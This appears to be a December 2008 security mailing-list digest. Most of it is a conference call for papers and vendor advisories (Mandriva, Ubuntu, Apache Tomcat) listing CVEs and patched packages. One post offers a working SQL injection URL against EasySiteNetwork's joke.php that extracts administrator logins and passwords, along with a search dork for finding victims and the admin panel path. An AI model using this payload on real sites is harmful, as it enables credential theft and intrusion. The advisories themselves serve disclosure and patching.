CONFidence 2009, CFP

2008-12-18 Thread Andrzej Targosz
Attention!

Calling all practitioners in the field of IT security! The 5th edition of the 
best Polish IT security conference, CONFIDENCE 2008, is taking place in May 
15/16, 2008.

We invite all to send the proposed topic and abstracts of presentation till the 
end of January. Please, remember that CONFidence is an open, international 
conference and all presentations should be given in English. If you want to 
give your lecture in Polish, please send an e-mail to the address given below.

The answer to CfP should include:
# name, last name and e-mail address of the potential speaker
# speaker's short bio, describing his experience and skills# speaker's place of 
residence
# presentation topic with short description of proposed lecture (no more than 
500 words)
# non-standard technical requirements

Applications should be sent to andrzej.targo...@}proidea.org.pl till 31 
January, 2009.

We are especially interested in presentation concerning:
# 3G/4G, SS7, WLAN, RFID, Bluetooth Security
# Analysis and reverse engineering of malicious code
# Analysis of vulnerability, attacks and defence against networks, hardware, 
software
# Virtualization and operating systems security
# Data recovery, Forensic and Incident Response
# Physical security
# Firewall technologies
# Web applications security and cryptographic

Caution!
We do not accept marketing, non-technical presentations aimed at presenting and 
selling any products. If your lecture presents company or its product, please 
do not send it!

CONFidence conference is a non-profit event and speakers are not being paid. 
However, we always try to provide financial help and cover travel expenses and 
accommodation if possible. It needs to be agreed upon after acceptance of the 
submission, though.

CONFidence Team
http://2009.confidence.org.pl



[ MDVSA-2008:245 ] firefox

2008-12-18 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2008:245
 http://www.mandriva.com/security/
 ___

 Package : firefox
 Date: December 17, 2008
 Affected: 2009.0
 ___

 Problem Description:

 Security vulnerabilities have been discovered and corrected in
 the latest Mozilla Firefox 3.x, version 3.0.5 (CVE-2008-5500,
 CVE-2008-5501, CVE-2008-5502, CVE-2008-5505, CVE-2008-5506,
 CVE-2008-5507, CVE-2008-5508, CVE-2008-5510, CVE-2008-5511,
 CVE-2008-5512, CVE-2008-5513).
 
 This update provides the latest Mozilla Firefox 3.x to correct
 these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5500
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5501
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5502
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5505
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5506
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5507
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5508
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5510
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5511
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5512
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5513
 
http://www.mozilla.org/security/known-vulnerabilities/firefox30.html#firefox3.0.5
 ___

 Updated Packages:

 Mandriva Linux 2009.0:
 8c26ae144535af31e98e911bbc210f71  
2009.0/i586/beagle-0.3.8-13.3mdv2009.0.i586.rpm
 7810ad014b7c1c098912b26500f7e484  
2009.0/i586/beagle-crawl-system-0.3.8-13.3mdv2009.0.i586.rpm
 4319abff57448721251018988222ef6d  
2009.0/i586/beagle-doc-0.3.8-13.3mdv2009.0.i586.rpm
 cae43ca5754dff94a31f056cc51a12b5  
2009.0/i586/beagle-epiphany-0.3.8-13.3mdv2009.0.i586.rpm
 8cb211f17efd54a3671b676a5f2a4af2  
2009.0/i586/beagle-evolution-0.3.8-13.3mdv2009.0.i586.rpm
 96d9834e221a0ecb71c9bdd4d4779383  
2009.0/i586/beagle-gui-0.3.8-13.3mdv2009.0.i586.rpm
 86fec216541d1c44305127681e809ff5  
2009.0/i586/beagle-gui-qt-0.3.8-13.3mdv2009.0.i586.rpm
 33de345c066c93fbd5e8c1860f2c6825  
2009.0/i586/beagle-libs-0.3.8-13.3mdv2009.0.i586.rpm
 1a41dea943561f1c3adcec826bead0db  
2009.0/i586/devhelp-0.21-3.2mdv2009.0.i586.rpm
 4dbbd875a8dbf8bd2fd4888919921404  
2009.0/i586/devhelp-plugins-0.21-3.2mdv2009.0.i586.rpm
 e58d51bc4fa89d702e636ba4b23cb389  
2009.0/i586/epiphany-2.24.0.1-3.2mdv2009.0.i586.rpm
 784fc591b55b31187d4485dfc5b96988  
2009.0/i586/epiphany-devel-2.24.0.1-3.2mdv2009.0.i586.rpm
 70a9c6d7eb2e12585236e8077c767d2f  
2009.0/i586/firefox-3.0.5-0.1mdv2009.0.i586.rpm
 404012d67b17271f9b1810ce7d4eff34  
2009.0/i586/firefox-af-3.0.5-0.1mdv2009.0.i586.rpm
 e44792595c5eea5f89f9ad0e9e3e543f  
2009.0/i586/firefox-ar-3.0.5-0.1mdv2009.0.i586.rpm
 cf87666de5298afee8f89cc1efc81170  
2009.0/i586/firefox-be-3.0.5-0.1mdv2009.0.i586.rpm
 845dbaffa1fb9971b5ee28f8be8b6581  
2009.0/i586/firefox-bg-3.0.5-0.1mdv2009.0.i586.rpm
 b9cf097750b56f3c4e521e98fb1f9d56  
2009.0/i586/firefox-bn-3.0.5-0.1mdv2009.0.i586.rpm
 cc293cd83a9ee72bb97c036f42273dee  
2009.0/i586/firefox-ca-3.0.5-0.1mdv2009.0.i586.rpm
 57a03f4acb708caa8eafd36fcb96dd7d  
2009.0/i586/firefox-cs-3.0.5-0.1mdv2009.0.i586.rpm
 d3d2065839405f82066c403e698d1127  
2009.0/i586/firefox-cy-3.0.5-0.1mdv2009.0.i586.rpm
 dc7edca3daf2cf64d3f2bbbc3ad8c167  
2009.0/i586/firefox-da-3.0.5-0.1mdv2009.0.i586.rpm
 9c5123ca87254d6586e5b18d97b22884  
2009.0/i586/firefox-de-3.0.5-0.1mdv2009.0.i586.rpm
 b1b4d131d6b58708eac6df72bac0ceea  
2009.0/i586/firefox-el-3.0.5-0.1mdv2009.0.i586.rpm
 6caa13f23401f1c729063e31478e238f  
2009.0/i586/firefox-en_GB-3.0.5-0.1mdv2009.0.i586.rpm
 1f962624e5603c9179c7f5152d79fa9d  
2009.0/i586/firefox-es_AR-3.0.5-0.1mdv2009.0.i586.rpm
 03806678c5b83ae46a8127512d63d4f8  
2009.0/i586/firefox-es_ES-3.0.5-0.1mdv2009.0.i586.rpm
 052bf4dad24a6af7dd5d12bd62c1fd84  
2009.0/i586/firefox-et-3.0.5-0.1mdv2009.0.i586.rpm
 5f4c188605529e4a1298bd4292601276  
2009.0/i586/firefox-eu-3.0.5-0.1mdv2009.0.i586.rpm
 d3cd29d6f4ea7707eb8b9098b9213cc8  
2009.0/i586/firefox-ext-beagle-0.3.8-13.3mdv2009.0.i586.rpm
 3bf794c00f80988fccdb647fba3cad60  
2009.0/i586/firefox-ext-mozvoikko-0.9.5-4.2mdv2009.0.i586.rpm
 f79140ea312818425cf82dba0c958bc6  
2009.0/i586/firefox-fi-3.0.5-0.1mdv2009.0.i586.rpm
 34abbcf70521374e959b77aebd8988a3  
2009.0/i586/firefox-fr-3.0.5-0.1mdv2009.0.i586.rpm
 c11a1a9ed5130792b4dfc93482b8aee5  
2009.0/i586/firefox-fy-3.0.5-0.1mdv2009.0.i586.rpm
 02d5fb831096441409b57f80d155ec4a  
2009.0/i586/firefox-ga_IE-3.0.5-0.1mdv2009.0.i586.rpm
 b29af7537bca10986bf2340ac407a4ba  
2009.0/i586/firefox-gl-3.0.5-0.1mdv2009.0.i586.rpm
 2a9e1449989

EasySiteNetwork (joke.php?id) Remote SQL injection Vulnerability

2008-12-18 Thread Ehsan_Hp200
 ###  IRANIN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
##  EasySiteNetwork (joke.php?id)
##
###
###
###
###
##
## AuTh0r : Ehsan_hp200
##
## H0ME   : www.only-4dl.tk
##
## Email  : ehsan_hp...@hotmail.com
##  
## VENDOR: http://www.easysitenetwork.com/
##
## Persian Gulf 4 Ever!
#
#
#
#
##
##

Dork :  inurl:joke.php?id= "Powered by EasySiteNetwork"


 Exploite:

 
www.victim.com/joke.php?id=-1992+union+select+1,concat(login,0x3a,password),3,4,5,6,7,8+from+admin_login--


###
Admin Panel: www.victim.com/siteadmin

,##
Special tanks to : All Parsi Hacker security Team members,SAHAND SHABAN , 
Dj7xpl , The.Mo3tafa , Jasoos Team ,Enigma2
,###

 ###  IRANIN THE BEST HACKERS IN THE WORLD 
##


php python extension safe_mode bypass

2008-12-18 Thread amir



[USN-695-1] shadow vulnerability

2008-12-18 Thread Kees Cook
===
Ubuntu Security Notice USN-695-1  December 18, 2008
shadow vulnerability
https://launchpad.net/bugs/306082
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  login   1:4.0.13-7ubuntu3.4

Ubuntu 7.10:
  login   1:4.0.18.1-9ubuntu0.2

Ubuntu 8.04 LTS:
  login   1:4.0.18.2-1ubuntu2.2

Ubuntu 8.10:
  login   1:4.1.1-1ubuntu1.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Paul Szabo discovered a race condition in login.  While setting up
tty permissions, login did not correctly handle symlinks.  If a local
attacker were able to gain control of the system utmp file, they could
cause login to change the ownership and permissions on arbitrary files,
leading to a root privilege escalation.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.13-7ubuntu3.4.diff.gz
  Size/MD5:   205508 177620b33b720ce87d522259acbdbe0c

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.13-7ubuntu3.4.dsc
  Size/MD5:  931 673a51cff0b63fd347c79c9545ea0fe4

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.13.orig.tar.gz
  Size/MD5:  1622557 034fab52e187e63cb52f153bb7f304c8

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.13-7ubuntu3.4_amd64.deb
  Size/MD5:   249668 c5c19a139a5fe912d19076866078c6e0

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.13-7ubuntu3.4_amd64.deb
  Size/MD5:   683786 f2ef6413b8c60d9b6a586599fe2e8b1e

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.13-7ubuntu3.4_i386.deb
  Size/MD5:   241052 31d9c29d22a4a01a8de1a629d4797165

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.13-7ubuntu3.4_i386.deb
  Size/MD5:   616702 e2237b8c7b6f8ec8d685caa31a2f58ab

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.13-7ubuntu3.4_powerpc.deb
  Size/MD5:   251530 f8d7a2e2ba0ac5eeaae53d37a9d99049

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.13-7ubuntu3.4_powerpc.deb
  Size/MD5:   665414 4d377d684bc618ca3c7e20521ea03a4e

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.13-7ubuntu3.4_sparc.deb
  Size/MD5:   240128 8a61b5741da03dbf64f97796461a7c5e

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.13-7ubuntu3.4_sparc.deb
  Size/MD5:   620410 b3c418caa6b787c682df86bc965613db

Updated packages for Ubuntu 7.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.18.1-9ubuntu0.2.diff.gz
  Size/MD5:   147849 23e5cd2a20460c6083d4e99afd93bb1b

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.18.1-9ubuntu0.2.dsc
  Size/MD5: 1199 c86a0638f6f64d4214f212ff0381a86d

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.18.1.orig.tar.gz
  Size/MD5:  2354234 3f54eaa3a35e7c559f4def92e9957581

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.18.1-9ubuntu0.2_amd64.deb
  Size/MD5:   327468 c80b850497e00c01d8ad3817e8e7c9ad

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.18.1-9ubuntu0.2_amd64.deb
  Size/MD5:   795952 e72d9d7ad5ca2f5f79085320d27881cd

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.18.1-9ubuntu0.2_i386.deb
  Size/MD5:   320296 b1e64e3bd6f567babba9b0ffed18b023

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.18.1-9ubuntu0.2_i386.deb
  Size/MD5:   716214 5d1ce7904c45af4807721bcccf89049c

  lpia architecture (Low Power Intel Architecture):


http://ports.ubuntu.com/pool/main/s/shadow/login_4.0.18.1-9ubuntu0.2_lpia.deb
  Size/MD5:   317166 9de8c0a5c50fa7a2fda13391fc01a964

http://ports.ubuntu.com/pool/main/s/shadow/passwd_4.0.18.1-9ubuntu0.2_lpia.deb
  Size/MD5:   709846 09a444f189c84cc2a705150a2a19a315

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.18.1-9ubuntu0.2_powerpc.deb
  Size/MD5:   328522 8b789214c1bad2adeb6d6cac6d144328

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.18.1-9ubuntu0.2_powerpc.de

[USN-694-1] libvirt vulnerability

2008-12-18 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-694-1  December 18, 2008
libvirt vulnerability
CVE-2008-5086
===

A security issue affects the following Ubuntu releases:

Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  libvirt00.3.0-0ubuntu2.1

Ubuntu 8.04 LTS:
  libvirt00.4.0-2ubuntu8.1

Ubuntu 8.10:
  libvirt00.4.4-3ubuntu3.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that libvirt did not mark certain operations as read-only. A
local attacker may be able to perform privileged actions such as migrating
virtual machines, adjusting autostart flags, or accessing privileged data in
the virtual machine memory and disks.


Updated packages for Ubuntu 7.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt_0.3.0-0ubuntu2.1.diff.gz
  Size/MD5: 3544 e3f113d1e263a8a5b2b831de6d242d1b

http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt_0.3.0-0ubuntu2.1.dsc
  Size/MD5:  808 df2b4d52fcdba599d46d3316b13458ff

http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt_0.3.0.orig.tar.gz
  Size/MD5:  2265548 e6a85e2ef99f985a298376e01fcc7a3c

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt-dev_0.3.0-0ubuntu2.1_amd64.deb
  Size/MD5:   230520 783cfc179c03e40500fc1a1a3354dac4

http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt0_0.3.0-0ubuntu2.1_amd64.deb
  Size/MD5:   186806 4d7e7f531ad07b08264856bf9762dc20

http://security.ubuntu.com/ubuntu/pool/universe/libv/libvirt/libvirt-bin_0.3.0-0ubuntu2.1_amd64.deb
  Size/MD5:   136992 27a0e129f38e57faae36b0adf6e1b000

http://security.ubuntu.com/ubuntu/pool/universe/libv/libvirt/python-libvirt_0.3.0-0ubuntu2.1_amd64.deb
  Size/MD5:86872 1da16e06104d27759886b575d2b73f8f

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt-dev_0.3.0-0ubuntu2.1_i386.deb
  Size/MD5:   217692 56dd66f156bee8b01f4b68e23e2811d3

http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt0_0.3.0-0ubuntu2.1_i386.deb
  Size/MD5:   186672 3a708d77e58e68b4009937ae9500f8e6

http://security.ubuntu.com/ubuntu/pool/universe/libv/libvirt/libvirt-bin_0.3.0-0ubuntu2.1_i386.deb
  Size/MD5:   135332 69ba54123bc7cb52eebac54313ff6001

http://security.ubuntu.com/ubuntu/pool/universe/libv/libvirt/python-libvirt_0.3.0-0ubuntu2.1_i386.deb
  Size/MD5:85340 c67f3ea7487e838af3ee7a0a21be4241

  lpia architecture (Low Power Intel Architecture):


http://ports.ubuntu.com/pool/main/libv/libvirt/libvirt-dev_0.3.0-0ubuntu2.1_lpia.deb
  Size/MD5:   232922 d16c1c0f50b965c2f8a0663995764b5f

http://ports.ubuntu.com/pool/main/libv/libvirt/libvirt0_0.3.0-0ubuntu2.1_lpia.deb
  Size/MD5:   198292 ff4ab36c840d51a92bc76d18aedba3c4

http://ports.ubuntu.com/pool/universe/libv/libvirt/libvirt-bin_0.3.0-0ubuntu2.1_lpia.deb
  Size/MD5:   142812 51aec3c2358e54a10783d6c14dcbfab1

http://ports.ubuntu.com/pool/universe/libv/libvirt/python-libvirt_0.3.0-0ubuntu2.1_lpia.deb
  Size/MD5:87042 80be0e16045d055f1afa897091a446bc

Updated packages for Ubuntu 8.04 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt_0.4.0-2ubuntu8.1.diff.gz
  Size/MD5:18325 d9c67215893dd4041c4a114d7b8feddf

http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt_0.4.0-2ubuntu8.1.dsc
  Size/MD5: 1080 360545d20502031bab8c298c71707346

http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt_0.4.0.orig.tar.gz
  Size/MD5:  2968326 2f6c6adb62145988f0e5021e5cbd71d3

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt-doc_0.4.0-2ubuntu8.1_all.deb
  Size/MD5:   303538 bbc86d969cd89c814fbd2dcaed27d3c0

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt-bin_0.4.0-2ubuntu8.1_amd64.deb
  Size/MD5:89346 7e272e9e45d8d76bfd7ffcf48fc6ec0f

http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt-dev_0.4.0-2ubuntu8.1_amd64.deb
  Size/MD5:   225052 3188ff93f87ddcc2a448db87c1d94272

http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt0-dbg_0.4.0-2ubuntu8.1_amd64.deb
  Size/MD5:   550738 b9ab13df10f0ab9d50e0311a8e99636c

http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt0_0.4.0-2ubuntu8.1_amd64.deb
  Size/MD5:   181422 4fdc4326e58624f344e5

[SECURITY] CVE-2008-2938 - Apache Tomcat information disclosure vulnerability - Update 2

2008-12-18 Thread Mark Thomas
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CVE-2008-2938: Apache Tomcat information disclosure vulnerability - Update 2

Severity: Important

Vendor:
Multiple (was The Apache Software Foundation)

Versions Affected:
Various

Description (new information):
This vulnerability was originally reported to the Apache Software Foundation as
a Tomcat vulnerability. Investigations quickly identified that the root cause
was an issue with the UTF-8 charset implementation within the JVM. The issue
existed in multiple JVMs including current versions from Sun, HP, IBM, Apple and
Apache.

It was decided to continue to report this as a Tomcat vulnerability until such
time as the JVM vendors had released fixed versions.

Unfortunately, the release of fixed JVMs and associated vulnerability disclosure
has not been co-ordinated. There has been some confusion within the user
community as to the nature and root cause of CVE-2008-2938. Therefore, the
Apache Tomcat Security Team is issuing this update to clarify the situation.

Mitigation:
Contact your JVM vendor for further information.
Tomcat users may upgrade as follows to a Tomcat version that contains a 
workaround:
6.0.x users should upgrade to 6.0.18
5.5.x users should upgrade to 5.5.27
4.1.x users should upgrade to 4.1.39

Credit:
This additional information was discovered by the Apache security
team.

References:
http://tomcat.apache.org/security.html

Mark Thomas
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.8 (Darwin)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAklKflkACgkQb7IeiTPGAkPEqwCg5WiCeyaGrUbP/PTIhqF8TGZt
DcsAoJIx+NnKCCAk2JxGftVZbxxPrWGl
=JALs
-END PGP SIGNATURE-



[USN-690-3] Firefox vulnerabilities

2008-12-18 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-690-3  December 18, 2008
firefox vulnerabilities
CVE-2008-5500, CVE-2008-5503, CVE-2008-5506, CVE-2008-5507,
CVE-2008-5511, CVE-2008-5512
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  firefox 1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1

After a standard system upgrade you need to restart Firefox to effect the
necessary changes.

Details follow:

Several flaws were discovered in the browser engine. These problems could allow
an attacker to crash the browser and possibly execute arbitrary code with user
privileges. (CVE-2008-5500)

Boris Zbarsky discovered that the same-origin check in Firefox could be
bypassed by utilizing XBL-bindings. An attacker could exploit this to read data
from other domains. (CVE-2008-5503)

Marius Schilder discovered that Firefox did not properly handle redirects to
an outside domain when an XMLHttpRequest was made to a same-origin resource.
It's possible that sensitive information could be revealed in the
XMLHttpRequest response. (CVE-2008-5506)

Chris Evans discovered that Firefox did not properly protect a user's data when
accessing a same-domain Javascript URL that is redirected to an unparsable
Javascript off-site resource. If a user were tricked into opening a malicious
website, an attacker may be able to steal a limited amount of private data.
(CVE-2008-5507)

Several flaws were discovered in the Javascript engine. If a user were tricked
into opening a malicious website, an attacker could exploit this to execute
arbitrary Javascript code within the context of another website or with chrome
privileges. (CVE-2008-5511, CVE-2008-5512)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1.diff.gz
  Size/MD5:   184514 ea36713d00feb7d1a44974a0e1c7f493

http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1.dsc
  Size/MD5: 1162 6930aff7e9ed188341f10c1a410ae8ec

http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614i.orig.tar.gz
  Size/MD5: 48160160 7234454384feba2cea0c2fe41c1db3f0

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_all.deb
  Size/MD5:53606 88e207c0ae72435f1ee16e2a9198cc0d

http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_all.deb
  Size/MD5:52716 720a5744971e6fdc93c6324473fce469

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_amd64.deb
  Size/MD5: 47668874 24ebc949c4b042769d1d192cde3fad6c

http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_amd64.deb
  Size/MD5:  2858706 b308aaff2727c534c0c10c938e01aca3

http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_amd64.deb
  Size/MD5:85988 03b8fab9f9e8c0066a2cf45c35efcb3a

http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_amd64.deb
  Size/MD5:  9491628 1bde3e7e8e4e5b7285025f3743ebdead

http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_amd64.deb
  Size/MD5:   72 a49b67decdfc95d1ceec3c978761e511

http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_amd64.deb
  Size/MD5:   165798 c5fc0c565b74a533e1293c1538296259

http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_amd64.deb
  Size/MD5:   247788 d1739f167db8c0094dc14b7000ba816d

http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_amd64.deb
  Size/MD5:   825458 0d923da8d43e1d5028f8e8347a0c01dc

http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_amd64.deb
  Size/MD5:   218528 90b4b67171bddf8e9636e8f9d8086524

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1_i386.deb
  Size/MD5: 44216124 36645bf7f4e758f672f6ad7bccad30d3

http://security.ubuntu.com/

[USN-690-2] Firefox vulnerabilities

2008-12-18 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-690-2  December 18, 2008
firefox vulnerabilities
CVE-2008-5500, CVE-2008-5503, CVE-2008-5504, CVE-2008-5506,
CVE-2008-5507, CVE-2008-5508, CVE-2008-5510, CVE-2008-5511,
CVE-2008-5512, CVE-2008-5513
===

A security issue affects the following Ubuntu releases:

Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  firefox 2.0.0.19+nobinonly1-0ubuntu0.7.10.1

After a standard system upgrade you need to restart Firefox to effect the
necessary changes.

Details follow:

Several flaws were discovered in the browser engine. These problems could allow
an attacker to crash the browser and possibly execute arbitrary code with user
privileges. (CVE-2008-5500)

Boris Zbarsky discovered that the same-origin check in Firefox could be
bypassed by utilizing XBL-bindings. An attacker could exploit this to read data
from other domains. (CVE-2008-5503)

Several problems were discovered in the JavaScript engine. An attacker could
exploit feed preview vulnerabilities to execute scripts from page content with
chrome privileges. (CVE-2008-5504)

Marius Schilder discovered that Firefox did not properly handle redirects to
an outside domain when an XMLHttpRequest was made to a same-origin resource.
It's possible that sensitive information could be revealed in the
XMLHttpRequest response. (CVE-2008-5506)

Chris Evans discovered that Firefox did not properly protect a user's data when
accessing a same-domain Javascript URL that is redirected to an unparsable
Javascript off-site resource. If a user were tricked into opening a malicious
website, an attacker may be able to steal a limited amount of private data.
(CVE-2008-5507)

Chip Salzenberg, Justin Schuh, Tom Cross, and Peter William discovered Firefox
did not properly parse URLs when processing certain control characters.
(CVE-2008-5508)

Kojima Hajime discovered that Firefox did not properly handle an escaped null
character. An attacker may be able to exploit this flaw to bypass script
sanitization. (CVE-2008-5510)

Several flaws were discovered in the Javascript engine. If a user were tricked
into opening a malicious website, an attacker could exploit this to execute
arbitrary Javascript code within the context of another website or with chrome
privileges. (CVE-2008-5511, CVE-2008-5512)

Flaws were discovered in the session-restore feature of Firefox. If a user were
tricked into opening a malicious website, an attacker could exploit this to
perform cross-site scripting attacks or execute arbitrary Javascript code with
chrome privileges. (CVE-2008-5513)


Updated packages for Ubuntu 7.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.19+nobinonly1-0ubuntu0.7.10.1.diff.gz
  Size/MD5:   193899 36adc1276acd43f74f72cfcc1ae3d0e9

http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.19+nobinonly1-0ubuntu0.7.10.1.dsc
  Size/MD5: 1667 191a120d310a4e50dc3890bc39dd5eb4

http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.19+nobinonly1.orig.tar.gz
  Size/MD5: 38003869 ef1cc2719a0d2e765e7395191917b0e1

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_2.0.0.19+nobinonly1-0ubuntu0.7.10.1_all.deb
  Size/MD5:   200940 bb5074878422fcc2770502b9ccb0da27

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.19+nobinonly1-0ubuntu0.7.10.1_amd64.deb
  Size/MD5: 78150706 95fdf710a1475b0bc9c2d05b93729e1d

http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.19+nobinonly1-0ubuntu0.7.10.1_amd64.deb
  Size/MD5:  3199474 a81af067e5cd04967c4b073e4ea88b3d

http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.19+nobinonly1-0ubuntu0.7.10.1_amd64.deb
  Size/MD5:98272 a5da4c672ee9cdb9238827240a1fd8d4

